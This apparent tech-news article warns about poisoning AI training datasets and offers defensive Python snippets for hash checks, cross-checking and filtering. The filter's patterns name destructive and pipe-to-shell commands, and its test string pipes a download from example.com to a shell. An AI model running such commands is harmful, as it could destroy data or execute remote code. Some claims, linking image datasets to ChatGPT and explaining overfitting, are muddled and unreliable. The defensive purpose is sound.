News Report Technology
May 10, 2023

Experts Caution Against ‘Malicious Inserts’ into AI Datasets in ChatGPT

In Brief

ChatGPT may be vulnerable to manipulation through the data it is trained on.

According to researchers, in 2022 an attacker could have poisoned 0.01% of the LAION-400M or COYO-700M datasets for as little as $60.

ChatGPT technology is becoming increasingly popular, but recent research suggests that it may be vulnerable through the training data it relies on. As models grow more complex and datasets grow larger, malicious actors could exploit this weakness to manipulate the datasets and cause machine learning models to produce inaccurate results.


The primary concern is that chatbot training corpora are often only “conditionally verified”: a certain level of trust is placed in the data without extensive verification, so these datasets can carry underlying issues that were never examined. Because full validation is rarely performed on collections of this size, malicious actors have an opening to manipulate the data.

In fact, researchers have estimated that in 2022 an attacker could have spent roughly $60 to poison 0.01% of the LAION-400M or COYO-700M datasets. Although that does not sound like much, poisoned data left unchecked can be exploited for an attacker's gain, leak into larger datasets, corrupt data quality, and ultimately produce unreliable machine-learning models.
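To put that fraction into perspective, here is a minimal back-of-the-envelope calculation in Python; the sample counts are rounded figures implied by the dataset names, not exact release sizes:

# Rough scale of a 0.01% poisoning attack on web-scale image-text datasets.
# Sample counts are approximations taken from the dataset names
# (LAION-400M, COYO-700M), not exact release figures.
datasets = {
    "LAION-400M": 400_000_000,
    "COYO-700M": 700_000_000,
}

poison_fraction = 0.0001  # 0.01%

for name, total in datasets.items():
    poisoned = int(total * poison_fraction)
    print(f"{name}: 0.01% of {total:,} samples = {poisoned:,} poisoned examples")
# LAION-400M: 0.01% of 400,000,000 samples = 40,000 poisoned examples
# COYO-700M: 0.01% of 700,000,000 samples = 70,000 poisoned examples

In other words, a tiny percentage still means tens of thousands of manipulated examples.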

It is necessary to take steps to safeguard these datasets against malicious data. Aggregating several independent data sources should become the standard for chatbot training datasets to ensure the data is reliable and accurate, and companies should actively probe their datasets for weaknesses that malicious actors could exploit.
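One concrete way to harden URL-distributed datasets of this kind, sketched below in Python, is to record a cryptographic hash of every sample when the dataset index is first built and to re-verify the hash at download time, so that content later swapped out on an expired or hijacked domain is rejected. This is a minimal illustration only; the index.jsonl file, its field names, and the fetch helper are assumptions made for the example, not part of any real dataset's tooling.

import hashlib
import json
import urllib.request

def fetch(url: str, timeout: int = 10) -> bytes:
    """Download raw bytes for a dataset sample (hypothetical helper)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()

def verify_samples(index_path: str):
    """Yield only samples whose content still matches the hash recorded
    when the dataset index was built; drop anything that has changed."""
    with open(index_path) as f:
        for line in f:
            record = json.loads(line)  # assumed fields: "url", "sha256"
            try:
                data = fetch(record["url"])
            except OSError:
                continue  # unreachable sample: skip rather than trust
            digest = hashlib.sha256(data).hexdigest()
            if digest == record["sha256"]:
                yield record["url"], data
            # else: content changed since collection -> possible poisoning

if __name__ == "__main__":
    for url, _ in verify_samples("index.jsonl"):
        print("verified:", url)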

AI Chatbots with Malicious Code Can Be Vulnerable to Hacking

The threat of malicious code in chatbots is serious: such code can be used to steal user data, gain unauthorized access to servers, and enable activities such as money laundering or data exfiltration. If an AI chatbot is trained on data containing malicious inserts, it could unknowingly reproduce that code in its responses and be turned into a tool for attackers.

Malicious actors can exploit this vulnerability by deliberately planting malicious code in the training data, and such code can also be introduced inadvertently through careless data collection. Because AI chatbots learn from whatever data they are presented with, this can lead them to learn incorrect responses or even malicious behavior.
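As a purely illustrative precaution, text destined for a training corpus can be screened for obviously executable or dangerous-looking content before the model ever sees it. The naive Python sketch below flags a few example patterns for human review; a real pipeline would need far more robust detection, since deliberate inserts can be obfuscated.

import re

# Naive, illustrative patterns for suspicious executable content in
# training text. Real pipelines need far more robust detection.
SUSPICIOUS_PATTERNS = [
    re.compile(r"<script\b", re.IGNORECASE),      # embedded HTML/JS
    re.compile(r"\beval\s*\("),                   # dynamic code execution
    re.compile(r"rm\s+-rf\s+/"),                  # destructive shell command
    re.compile(r"curl\s+\S+\s*\|\s*(sh|bash)"),   # pipe-to-shell download
]

def looks_suspicious(text: str) -> bool:
    return any(p.search(text) for p in SUSPICIOUS_PATTERNS)

def filter_corpus(documents):
    """Split a corpus into (kept, flagged) lists for human review."""
    kept, flagged = [], []
    for doc in documents:
        (flagged if looks_suspicious(doc) else kept).append(doc)
    return kept, flagged

kept, flagged = filter_corpus([
    "A friendly explanation of gradient descent.",
    "Run this to fix your PC: curl http://example.com/x | sh",
])
print(len(kept), "kept,", len(flagged), "flagged for review")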


Another danger AI chatbots face is “overfitting.” This occurs when a prediction model is trained too closely on the data it was given, leading to poor predictions when presented with new data. It is a particular problem here because a chatbot trained on malicious code could become increasingly effective at injecting that code into its responses as it grows more familiar with the data.
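Overfitting is normally caught by holding out data the model never trains on and watching for the point where validation error stops improving while training error keeps falling. The following framework-free Python sketch illustrates that check with made-up loss values and a simple early-stopping rule.

def should_stop(val_losses, patience: int = 3) -> bool:
    """Return True once validation loss has failed to improve for
    `patience` consecutive epochs -- a simple early-stopping rule."""
    if len(val_losses) <= patience:
        return False
    best_before = min(val_losses[:-patience])
    return all(loss >= best_before for loss in val_losses[-patience:])

# Illustrative (made-up) losses: training keeps improving while
# validation flattens and then worsens -- the signature of overfitting.
train_losses = [1.00, 0.70, 0.50, 0.35, 0.25, 0.18, 0.12]
val_losses   = [1.05, 0.80, 0.65, 0.60, 0.61, 0.63, 0.66]

for epoch in range(1, len(val_losses) + 1):
    if should_stop(val_losses[:epoch]):
        print(f"stop at epoch {epoch}: validation no longer improving")
        break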

To prevent these weaknesses, it is essential to be aware of the risks and to take precautions so that the training data used to teach ChatGPT is secure and reliable. The original training data should be preserved in a separate, verifiable form so that later “malicious inserts” in the source material cannot conflict with or silently overwrite it, and, where capturing multiple confirmed domains is feasible, the data should be examined and cross-checked against those domains to validate it.
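One hedged illustration of such cross-checking: fetch the same sample from several independent mirrors or archive snapshots and keep it only when a clear majority of the copies are byte-for-byte identical. The threshold and the example data below are arbitrary choices made for the sketch.

import hashlib
from collections import Counter

def consensus_ok(copies: list[bytes], threshold: float = 2 / 3) -> bool:
    """Keep a sample only if a clear majority of independently fetched
    copies (e.g. different mirrors or archive snapshots) are identical."""
    if not copies:
        return False
    digests = [hashlib.sha256(c).hexdigest() for c in copies]
    _, most_common_count = Counter(digests).most_common(1)[0]
    return most_common_count / len(copies) >= threshold

# Illustrative: three fetches of the "same" sample, one of which has
# been silently altered on its source domain.
copies = [b"a cat sitting on a mat", b"a cat sitting on a mat", b"BUY CRYPTO NOW"]
print(consensus_ok(copies))  # True: 2 of 3 copies agree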

Chatbot technology promises to transform how people communicate. But before it can realize its full potential, it needs to be improved and safeguarded. Datasets for chatbots must be carefully checked and prepared to fend off malicious actors. By doing this, we can make full use of the technology’s potential and keep pushing the limits of artificial intelligence.


Disclaimer

In line with the Trust Project guidelines, please note that the information provided on this page is not intended to be and should not be interpreted as legal, tax, investment, financial, or any other form of advice. It is important to only invest what you can afford to lose and to seek independent financial advice if you have any doubts. For further information, we suggest referring to the terms and conditions as well as the help and support pages provided by the issuer or advertiser. MetaversePost is committed to accurate, unbiased reporting, but market conditions are subject to change without notice.

About The Author

Damir is the team leader, product manager, and editor at Metaverse Post, covering topics such as AI/ML, AGI, LLMs, Metaverse, and Web3-related fields. His articles attract a massive audience of over a million users every month. He is an expert with 10 years of experience in SEO and digital marketing. Damir has been mentioned in Mashable, Wired, Cointelegraph, The New Yorker, Inside.com, Entrepreneur, BeInCrypto, and other publications. He travels between the UAE, Turkey, Russia, and the CIS as a digital nomad. Damir earned a bachelor's degree in physics, which he believes has given him the critical thinking skills needed to be successful in the ever-changing landscape of the internet.
